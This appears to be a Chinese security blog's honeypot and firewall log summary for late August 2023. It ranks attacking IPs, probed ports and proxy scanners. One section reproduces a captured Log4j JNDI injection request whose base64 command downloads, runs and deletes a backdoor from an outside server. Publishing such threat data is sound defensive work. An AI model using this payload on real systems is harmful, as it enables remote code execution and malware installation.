2023-08-30 防火墙日志汇总报告

博主： zmx
发布时间：2023 年 08 月 30 日
647 次浏览
1 条评论
15055字数
分类：网络威胁报告

# 总览

数据集日期范围：`2023-08-14` 至 `2023-08-30`
数据集采样范围：蜜罐系统、Web应用日志

# 蜜罐捕获

以下为蜜罐捕获数据，样本数`209422`

## 端口转发

以下为常用端口(3306, 3389, 6379)端口的转发日志所得出的结论。

|  IP地址 | 次数 |
| ----------------- | ---: |
| 119.6.58.20     | 35 |
| 167.248.133.124 | 14 |
| 116.169.61.86   | 13 |
| 167.94.138.50   | 13 |
| 103.20.61.19    | 10 |
| 125.77.159.246  | 10 |

## 非交互式蜜罐捕获

| IP地址          | 次数 |
| ----------------- | ------ |
| 87.251.64.11    | 9719 |
| 89.248.163.212  | 7347 |
| 89.248.163.88   | 7263 |
| 89.248.165.95   | 4095 |
| 89.248.163.96   | 3857 |
| 89.248.163.224  | 3739 |
| 45.135.232.28   | 1969 |
| 78.128.114.22   | 1691 |
| 185.161.248.31  | 1346 |
| 89.248.165.83   | 1333 |
| 141.98.11.58    | 1302 |
| 89.248.165.14   | 1265 |
| 123.160.221.18  | 1253 |
| 111.7.96.148    | 1195 |
| 111.7.96.151    | 1191 |
| 152.89.198.113  | 1161 |
| 123.160.221.14  | 1130 |
| 123.160.221.22  | 1113 |
| 141.98.11.119   | 1103 |
| 123.160.221.20  | 1099 |
| 111.7.96.150    | 1059 |
| 111.7.96.147    | 1036 |
| 36.99.136.136   | 1029 |
| 111.7.96.149    | 1019 |
| 36.99.136.137   | 1017 |
| 36.99.136.129   | 1001 |
| 36.99.136.128   |  987 |
| 183.165.238.33  |  972 |
| 125.125.239.123 |  935 |
| 123.160.221.16  |  933 |
| 92.63.196.80    |  904 |
| 178.159.37.98   |  777 |
| 83.97.73.87     |  771 |
| 182.34.201.3    |  764 |
| 92.63.196.58    |  736 |
| 62.122.184.88   |  710 |
| 185.73.124.50   |  659 |
| 89.248.165.88   |  645 |
| 222.129.38.28   |  638 |
| 89.248.163.203  |  638 |
| 91.240.118.187  |  624 |
| 194.26.135.75   |  624 |
| 185.224.128.17  |  575 |
| 89.248.165.32   |  566 |
| 125.125.208.166 |  532 |
| 62.233.50.179   |  531 |
| 179.43.163.134  |  530 |
| 122.230.46.127  |  527 |
| 179.60.147.47   |  518 |

## 端口号

| 端口号 | 次数 |
| -------- | ------ |
|   9001 | 4805 |
|   1433 | 2369 |
|   8080 | 1862 |
|   8081 | 1181 |
|   8443 | 1060 |
|  30005 |  767 |
|   5555 |  701 |
|     23 |  652 |
|   5060 |  642 |
|   8888 |  599 |
|   2222 |  587 |
|  10000 |  557 |
|   9090 |  533 |
|   3128 |  514 |
|     82 |  505 |
|   2375 |  491 |
|   9200 |  486 |
|   5900 |  478 |
|   9000 |  448 |
|    554 |  441 |
|   7777 |  432 |
|   8090 |  432 |
|   4433 |  413 |
|   1080 |  409 |
|   8088 |  402 |
|   4444 |  381 |
|   4443 |  379 |
|   9080 |  378 |
|   5000 |  377 |
|   9999 |  365 |
|   3000 |  359 |
|     21 |  356 |
|   3333 |  347 |
|    993 |  336 |
|   8005 |  329 |
|     25 |  325 |
|   5432 |  324 |
|     53 |  319 |
|   3390 |  305 |
|     83 |  302 |

## 攻击行为

### log4j

95.214.55.244 发动了log4j的攻击
具体请求：

```bash
b"GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nReferer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBy"
```

解析base64后，得到`boxshell`针对于Linux系统的可执行文件，经过沙箱检测，此文件为后门木马，由UPX进行压缩。

### 代理扫描

| ip              | ip              | ip              | ip             | ip              | ip              |
| ----------------- | ----------------- | ----------------- | ---------------- | ----------------- | ----------------- |
| 1.202.113.37    | 180.95.231.5    | 124.117.198.178 | 60.13.138.48   | 112.193.161.71  | 221.199.72.73   |
| 1.202.114.179   | 180.95.238.130  | 124.133.213.52  | 60.13.138.74   | 112.193.162.199 | 222.172.130.247 |
| 1.83.125.14     | 180.95.238.68   | 124.133.214.35  | 60.13.138.77   | 112.193.170.20  | 222.181.11.112  |
| 1.85.216.17     | 180.95.238.94   | 124.160.236.138 | 60.13.138.80   | 112.193.170.52  | 222.181.11.113  |
| 1.85.216.199    | 182.138.158.10  | 124.31.104.226  | 60.13.6.63     | 112.193.193.246 | 222.181.11.227  |
| 1.85.217.12     | 182.138.158.107 | 124.31.105.196  | 60.13.7.20     | 112.193.194.55  | 222.181.11.251  |
| 1.85.217.216    | 182.138.158.111 | 124.31.106.104  | 60.13.7.59     | 112.66.104.157  | 222.181.11.38   |
| 1.85.218.214    | 182.138.158.171 | 124.31.106.85   | 60.13.7.93     | 112.66.105.132  | 222.181.11.54   |
| 1.85.218.228    | 182.138.158.179 | 124.31.107.16   | 60.17.102.104  | 112.66.105.147  | 222.181.11.79   |
| 1.85.218.24     | 182.138.158.208 | 124.90.215.128  | 60.17.104.150  | 112.66.109.204  | 222.94.140.11   |
| 1.85.219.118    | 182.138.158.236 | 124.90.49.183   | 60.17.106.35   | 112.66.109.6    | 222.94.140.136  |
| 101.204.251.226 | 171.37.38.126   | 123.191.147.58  | 59.50.182.7    | 111.224.249.230 | 220.173.208.242 |
| 101.67.137.97   | 182.138.158.241 | 124.90.53.250   | 60.17.112.221  | 112.66.110.175  | 222.94.140.141  |
| 101.67.138.140  | 182.138.158.57  | 125.84.236.252  | 60.17.118.4    | 112.66.111.54   | 222.94.140.19   |
| 101.67.138.98   | 182.242.169.141 | 125.84.239.207  | 60.17.122.195  | 112.94.188.46   | 222.94.140.206  |
| 101.68.126.4    | 182.242.169.33  | 139.170.202.124 | 60.17.97.34    | 112.94.188.54   | 222.94.140.230  |
| 101.71.208.62   | 182.242.170.169 | 139.170.202.250 | 60.17.97.6     | 113.200.72.204  | 222.94.140.58   |
| 101.71.208.95   | 182.242.180.170 | 139.170.202.77  | 61.181.2.72    | 113.206.179.87  | 222.94.140.83   |
| 101.71.211.117  | 182.245.27.53   | 139.170.203.176 | 61.52.72.219   | 113.206.181.7   | 222.94.163.31   |
| 110.177.176.205 | 182.245.45.82   | 139.170.203.245 | 61.52.74.204   | 113.206.183.206 | 223.166.22.196  |
| 110.177.176.75  | 182.245.57.157  | 139.170.203.81  | 61.52.82.146   | 113.206.199.16  | 223.166.22.205  |
| 110.177.178.246 | 182.245.81.69   | 14.204.44.110   | 61.52.86.112   | 114.100.176.36  | 223.166.22.207  |
| 110.177.179.95  | 182.88.78.220   | 140.224.64.218  | 64.62.197.101  | 114.100.176.47  | 223.166.22.217  |
| 110.177.182.10  | 183.134.184.93  | 140.224.64.237  | 64.62.197.106  | 114.100.177.136 | 223.166.22.231  |
| 110.52.194.174  | 183.185.109.107 | 144.123.92.16   | 64.62.197.12   | 114.100.177.178 | 223.166.22.245  |
| 110.52.195.162  | 183.185.109.249 | 144.255.16.82   | 64.62.197.131  | 114.100.177.196 | 223.166.22.246  |
| 110.52.195.196  | 183.191.123.232 | 144.255.17.58   | 64.62.197.146  | 114.100.177.215 | 223.166.22.254  |
| 110.52.216.111  | 183.191.126.27  | 144.255.18.16   | 64.62.197.147  | 114.100.177.44  | 223.166.22.33   |
| 110.52.216.136  | 184.105.139.68  | 144.255.31.200  | 64.62.197.157  | 115.148.153.197 | 223.166.22.85   |
| 110.53.241.169  | 184.105.247.254 | 144.255.31.206  | 64.62.197.168  | 116.52.105.32   | 223.166.22.97   |
| 110.80.168.25   | 216.218.206.108 | 144.255.31.28   | 64.62.197.194  | 116.54.33.105   | 27.184.93.224   |
| 110.80.169.219  | 216.218.206.69  | 144.255.31.86   | 64.62.197.209  | 117.13.170.16   | 27.227.186.67   |
| 111.162.137.43  | 218.95.226.197  | 150.255.123.182 | 64.62.197.225  | 117.13.171.35   | 27.227.186.78   |
| 111.162.140.99  | 218.95.226.247  | 150.255.182.161 | 64.62.197.237  | 117.14.114.186  | 27.227.186.80   |
| 111.162.145.216 | 218.95.234.148  | 150.255.39.159  | 64.62.197.239  | 117.14.146.248  | 27.227.187.142  |
| 111.162.146.235 | 218.95.234.172  | 171.116.202.37  | 64.62.197.31   | 117.14.151.192  | 27.227.187.215  |
| 111.162.151.170 | 219.143.174.194 | 171.118.64.119  | 64.62.197.36   | 117.14.153.161  | 27.47.24.29     |
| 111.162.152.29  | 219.143.174.230 | 171.12.10.121   | 64.62.197.42   | 117.15.91.35    | 27.47.24.3      |
| 111.162.159.21  | 219.143.174.38  | 171.12.10.13    | 64.62.197.62   | 117.25.124.24   | 27.47.25.142    |
| 111.224.218.166 | 219.157.201.137 | 171.12.10.244   | 64.62.197.67   | 117.25.124.99   | 27.47.25.17     |
| 111.224.221.47  | 220.173.208.101 | 171.120.158.36  | 64.62.197.72   | 118.81.86.237   | 27.98.228.163   |
| 111.224.234.126 | 220.173.208.170 | 171.34.176.161  | 64.62.197.97   | 119.163.40.100  | 27.98.228.250   |
| 111.224.235.50  | 220.173.208.189 | 171.34.176.211  | 65.49.1.103    | 119.164.100.244 | 36.106.166.192  |
| 119.164.106.77  | 36.106.167.158  | 122.96.28.234   | 43.248.108.133 | 123.191.131.241 | 59.173.181.75   |
| 119.164.97.179  | 36.106.167.232  | 122.96.28.40    | 43.248.108.232 | 123.191.134.183 | 59.50.180.152   |
| 119.60.104.11   | 36.106.167.86   | 122.96.28.7     | 43.248.108.248 | 123.145.3.247   | 58.19.56.69     |
| 119.60.104.252  | 36.20.61.188    | 123.144.23.138  | 58.19.10.233   | 123.145.30.16   | 58.19.59.156    |
| 119.60.104.29   | 36.20.61.219    | 123.144.27.159  | 58.19.45.215   | 123.145.6.133   | 58.19.59.171    |
| 119.60.104.70   | 36.24.136.64    | 123.144.27.241  | 58.19.47.147   | 123.158.48.188  | 58.19.59.251    |
| 119.60.104.97   | 36.24.139.22    | 123.145.12.136  | 58.19.47.29    | 119.60.105.77   | 36.32.2.211     |
| 119.60.105.103  | 36.24.139.228   | 123.145.12.137  | 58.19.47.95    | 120.0.52.129    | 36.32.2.216     |
| 119.60.105.141  | 36.32.2.166     | 123.145.17.155  | 58.19.50.106   | 120.0.52.195    | 36.32.2.220     |
| 119.60.105.207  | 36.32.2.176     | 123.145.18.171  | 58.19.51.104   | 120.0.52.217    | 36.32.2.26      |
| 119.60.105.230  | 36.32.2.190     | 123.145.21.130  | 58.19.56.34    |                 |                 |
| 123.245.24.219  | 171.8.138.141   | 123.245.24.213  | 59.50.183.46   | 111.224.7.51    | 220.250.10.152  |
| 123.245.25.28   | 171.8.138.70    | 123.245.24.52   | 59.52.100.117  | 111.85.200.101  | 220.250.10.59   |
| 124.235.138.240 | 171.8.138.88    | 123.245.24.57   | 59.52.102.228  | 111.85.200.112  | 220.250.11.114  |
| 171.12.10.150   | 175.152.28.77   | 123.245.24.74   | 59.52.179.0    | 111.85.200.150  | 220.250.11.214  |
| 171.34.177.234  | 65.49.1.114     | 120.0.52.23     | 36.32.2.66     | 119.164.102.167 | 36.106.166.210  |
| 171.34.178.172  | 65.49.1.21      | 120.0.52.233    | 36.32.2.86     | 123.158.61.89   | 58.19.61.2      |
| 171.34.178.175  | 65.49.1.28      | 121.29.178.124  | 36.5.68.104    | 123.160.172.117 | 58.19.76.227    |
| 171.36.130.155  | 65.49.1.68      | 121.29.178.203  | 36.5.68.231    | 123.160.173.32  | 59.173.180.169  |
| 171.36.130.90   | 65.49.1.71      | 121.29.178.208  | 36.5.69.7      | 123.160.173.66  | 59.173.180.175  |
| 171.36.96.33    | 65.49.1.81      | 121.29.178.72   | 42.48.78.24    | 123.160.234.86  | 59.173.180.51   |
| 171.37.175.242  | 65.49.1.99      | 122.96.28.141   | 42.48.78.28    | 123.163.114.173 | 59.173.180.8    |
| 171.37.179.178  | 65.49.20.68     | 122.96.28.199   | 42.48.79.131   | 123.163.114.198 | 59.173.181.232  |
| 171.37.182.47   | 74.82.47.18     | 122.96.28.230   | 42.63.253.205  | 123.191.130.169 | 59.173.181.64   |
| 182.138.158.180 | 175.152.29.228  | 123.245.25.125  | 59.55.114.158  | 111.85.200.151  | 220.250.62.47   |
| 182.138.158.77  | 175.152.32.132  | 123.245.25.128  | 59.55.114.207  | 111.85.200.199  | 220.250.63.34   |
| 184.105.139.70  | 175.152.33.165  | 124.117.192.228 | 60.13.138.135  | 111.85.200.245  | 220.250.63.35   |
| 184.105.247.195 | 180.109.49.11   | 124.117.193.189 | 60.13.138.138  | 111.85.200.33   | 221.11.51.25    |
| 216.218.206.67  | 180.95.231.110  | 124.117.195.37  | 60.13.138.157  | 111.85.200.64   | 221.11.51.27    |
| 220.173.208.23  | 180.95.231.126  | 124.117.197.213 | 60.13.138.161  | 111.85.200.89   | 221.11.60.150   |
| 38.45.217.2     | 171.37.66.231   | 123.245.24.141  | 59.50.183.171  | 111.224.249.76  | 220.173.209.17  |
| 60.191.125.35   | 171.37.207.229  | 123.191.144.35  | 59.50.181.2    | 123.191.137.240 | 59.50.180.46    |
| 65.49.20.66     | 180.95.231.161  | 124.117.198.100 | 60.13.138.172  | 112.117.17.13   | 221.14.175.86   |
| 74.82.47.2      | 180.95.231.21   | 124.117.198.160 | 60.13.138.242  | 112.193.161.100 | 221.199.65.97   |
| 74.82.47.5      | 171.8.138.132   | 123.245.24.18   | 59.50.183.27   | 111.224.6.98    | 220.177.9.114   |

# 综合汇总

| ip               | 类型     | 次数 |
| ------------------ | ---------- | ------ |
| 89.248.163.212   | 蜜罐     |  226 |
| 89.248.163.88    | 蜜罐     |  222 |
| 89.248.163.224   | 蜜罐     |  105 |
| 89.248.163.96    | 蜜罐     |  100 |
| 220.196.160.0/24 | web服务  |   76 |
| 78.128.114.22    | 蜜罐     |   49 |
| 141.98.11.58     | 蜜罐     |   39 |
| 141.98.11.119    | 蜜罐     |   32 |
| 180.101.245.0/24 | web服务  |   26 |
| 178.159.37.98    | 蜜罐     |   23 |
| 194.26.135.75    | 蜜罐     |   20 |
| 87.251.64.11     | 蜜罐     |   19 |
| 89.248.165.95    | 蜜罐     |   18 |
| 62.122.184.88    | 蜜罐     |   16 |
| 163.53.194.58    | 蜜罐     |   14 |
| 91.240.118.187   | 蜜罐     |   14 |
| 59.83.208.0/24   | web服务  |   14 |
| 117.187.173.115  | 蜜罐     |    9 |
| 223.111.175.115  | 蜜罐     |    9 |
| 117.187.173.106  | 蜜罐     |    8 |
| 180.101.244.0/24 | web服务  |    8 |
| 36.99.136.128    | 蜜罐     |    8 |
| 117.187.173.72   | 蜜罐     |    7 |
| 45.135.232.28    | 蜜罐     |    7 |
| 117.187.173.99   | 蜜罐     |    7 |
| 213.226.123.100  | 蜜罐     |    7 |
| 223.111.175.106  | 蜜罐     |    7 |
| 223.111.175.110  | 蜜罐     |    7 |
| 223.111.175.33   | 蜜罐     |    7 |
| 117.187.173.45   | 蜜罐     |    7 |
| 117.187.173.120  | 蜜罐     |    7 |
| 118.31.118.27    | 蜜罐     |    7 |
| 117.187.173.90   | 蜜罐     |    7 |
| 36.99.136.136    | 蜜罐     |    7 |
| 117.187.173.48   | 蜜罐     |    6 |
| 223.111.175.113  | 蜜罐     |    6 |
| 117.187.173.38   | 蜜罐     |    6 |
| 223.111.175.104  | 蜜罐     |    6 |
| 223.111.175.35   | 蜜罐     |    6 |
| 223.111.175.117  | 蜜罐     |    6 |
| 117.187.173.97   | 蜜罐     |    6 |
| 117.187.173.121  | 蜜罐     |    6 |
| 36.99.136.129    | 蜜罐     |    6 |
| 223.111.175.36   | 蜜罐     |    5 |
| 117.187.173.119  | 蜜罐     |    5 |
| 117.187.173.69   | 蜜罐     |    5 |
| 62.233.50.179    | 蜜罐     |    5 |
| 117.187.173.100  | 蜜罐     |    5 |
| 223.111.175.107  | 蜜罐     |    5 |
| 117.187.173.76   | 蜜罐     |    5 |
| 117.187.173.67   | 蜜罐     |    5 |
| 80.66.76.32      | 蜜罐     |    5 |
| 80.94.92.12      | 蜜罐     |    5 |
| 223.111.175.32   | 蜜罐     |    5 |
| 117.187.173.108  | 蜜罐     |    5 |
| 92.205.107.64    | 页面枚举 |    1 |
| 149.56.150.3     | 页面枚举 |    1 |
| 15.204.136.222   | 页面枚举 |    1 |
| 172.232.53.42    | 页面枚举 |    1 |
| 147.78.47.122    | 页面枚举 |    1 |
| 98.66.138.129    | 页面枚举 |    1 |
| 42.3.27.207      | 页面枚举 |    1 |